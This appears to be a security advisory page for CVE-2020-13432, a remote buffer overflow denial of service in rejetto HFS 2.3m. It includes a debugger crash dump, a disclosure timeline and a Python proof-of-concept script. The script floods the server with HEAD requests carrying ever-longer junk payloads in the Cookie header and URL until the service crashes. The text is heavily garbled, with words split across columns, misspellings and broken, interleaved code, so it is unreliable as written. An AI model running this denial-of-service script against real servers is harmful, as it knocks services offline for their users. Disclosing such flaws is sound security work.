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HFS Http File Server 2.3m Build 300 Buffer Overflow

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Posted Jun 8, 2020

HFS Http File Server version 2.3m build 300 suffers from a remote buffer overflow vulnerability that can lead to a denial of service.

tags | exploit, remote, web, denial of service, overflow advisories | CVE-2020-13432 |
SHA-256 | c7ab5ba2d2663b28ffedb5d9db2e23328041d24057b118524685224b0d480c62 | Download | Favorite | View

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[Vendor] www.rejetto.com						
[Product] HFS Http File Server v2	2.3m Build 300					
[Vulnerability Type] Remote Buffer Overflow	(DoS)					
[CVE Reference] CVE-2020-13432						
[Security Issue] rejetto HFS (aka HTTP I files or folders are us invalid-pointer write a with a long URI or long	sed, allows remot access violation	te attackers to via concurrent	trigger an HTTP reques	ts		
Remote unauthenticated using an incrementing ovalues in the URL parameters results in hfs.exe service violation.	or specific paylo meters or HTTP ho	oad range of ju eaders sent to	nk character the server.	s for This		
Requirements: hfs.exe must have at le Test using a remote IP	east one saved vo	irtual file or e same machine	folder prese (localhost).	nt.		
Dump (e4c.3a8): Access viole For analysis of this fi NARNING: Stack overflox eax-000a1390 ebx-000a1 eip-777efbb4 esp-000a0 cs-0023 as-002b ds-00 ntdll1RtlpResolveAssem 777efbb4 53 0:0000 load winext/ms0 0:0000 lexploitable WARNING: Stack overflox *** WARNING: Unable to Exploitablity Classif; Recommended Bug Title:	ile, run !analyze « detected. The 18c ecx=006ebl88 10c ebp=000a12cc 12b es=002b fs= 1ystorageMapEnt: push ebx 1cc « detected. The verify checksum ication: EXFLOIT	e -v unwound frames edx=001b0000 e iop1=0 =0053 gs=002b ry+0x18: unwound frames for hfs.exe ABLE	are extracte esi=00000000 nv up ei pl	d from outs edi=0000000 nz na pe r efi=0021020 d from outs	ride normal stack bound 12 16	
ntdll!RtlpResolveAssemb PROCESS_NAME: hfs.exe	lyStorageMapEnt:	ry+0x0000000000	000018 (Hash	=0x7a29717c	.0x325e6a71)	
FOLLOWUP_IP: hfs+8fad7 0048fad7 8945f0	mov dword	ptr [ebp-10h],	eax			
WRITE_ADDRESS: 000a0e0	18					
[References] https://github.com/reje	etto/hfs2/release	es/tag/v2.4-rc0	1			
[Exploit/POC] from socket import * import time,sys						
#HFS HTTP File Server v #Vendor: www.rejetto.cc #Remote Remote Buffer (#Note: hfs.exe must hav #test using a remote ! #Discovery: hyp3rlinx #hyp3rlinx.albervista.cc #ISR: ApparitionSec	om Overflow DoS re at least one : P and not from the	saved virtual i	Tile or folde	r on the ta	irget	
res="" once=0 cnt=0						
max_requests=1666 def hfs_dos():						
global ip,port,leng	gth, res, once, cnt	,max_requests				
cnt+=1 length += 1 payload = "A"*length	- h					
try: s=socket(AF INE	ET, SOCK STREAM)					
bof ="HEAD /?mc s.send(bof.enco if once==0:	oort)) HTTP/1.1\r\nHost de="+payload+"	t: "+ip+"Cookie HTTP/1.1\r\nHos	: "+payload+ :t: "+ip+"\r\	"\r\n\r\n" n\r\n"		
if "HFS	"": "Targets up plea: 3 2.3m" not in s:	tr(res):		(#)		
except Exception as if e != None:	int("[!] Non vul: it() s e: find("timed out";		sion, exiting	g:(")		
if res-			hind a firew	all? :(")		
pri	int("[!] Done!") it()					

```
s.close()
            if cnt == max_requests:
    return False
return True
def msg():
    print("HFS HTTP File Server v2.3m build 300.")
    print("UBauthenticated Remote Buffer Overflow (DoS - PoC)")
    print("Virtual HFS saved file or folder required.")
    print("Bun from a different methine (IF) then the target.")
    print("By HypSrlinx - AppartionOmeth")
     f __name__=="__main__":
           length=3
            if len(sys.argv) != 3:
                        msg()
print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
exit()
             ip = sys.argv[1]
port = int(sys.argv[2])
           msq()
            while True:
    if not hfs_dos():
        print("[!] Failed, non vuln version or no virtual files exist :(")
        break
  [POC Video URL] https://www.youtube.com/watch?v=qQ-EawfXuWY
   [Network Access]
  [Severity]
High
 [Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor creates fix: May 29, 2020
Vendor released new version 2.4 : June 7, 2020
June 8, 2020 : Public Disclosure
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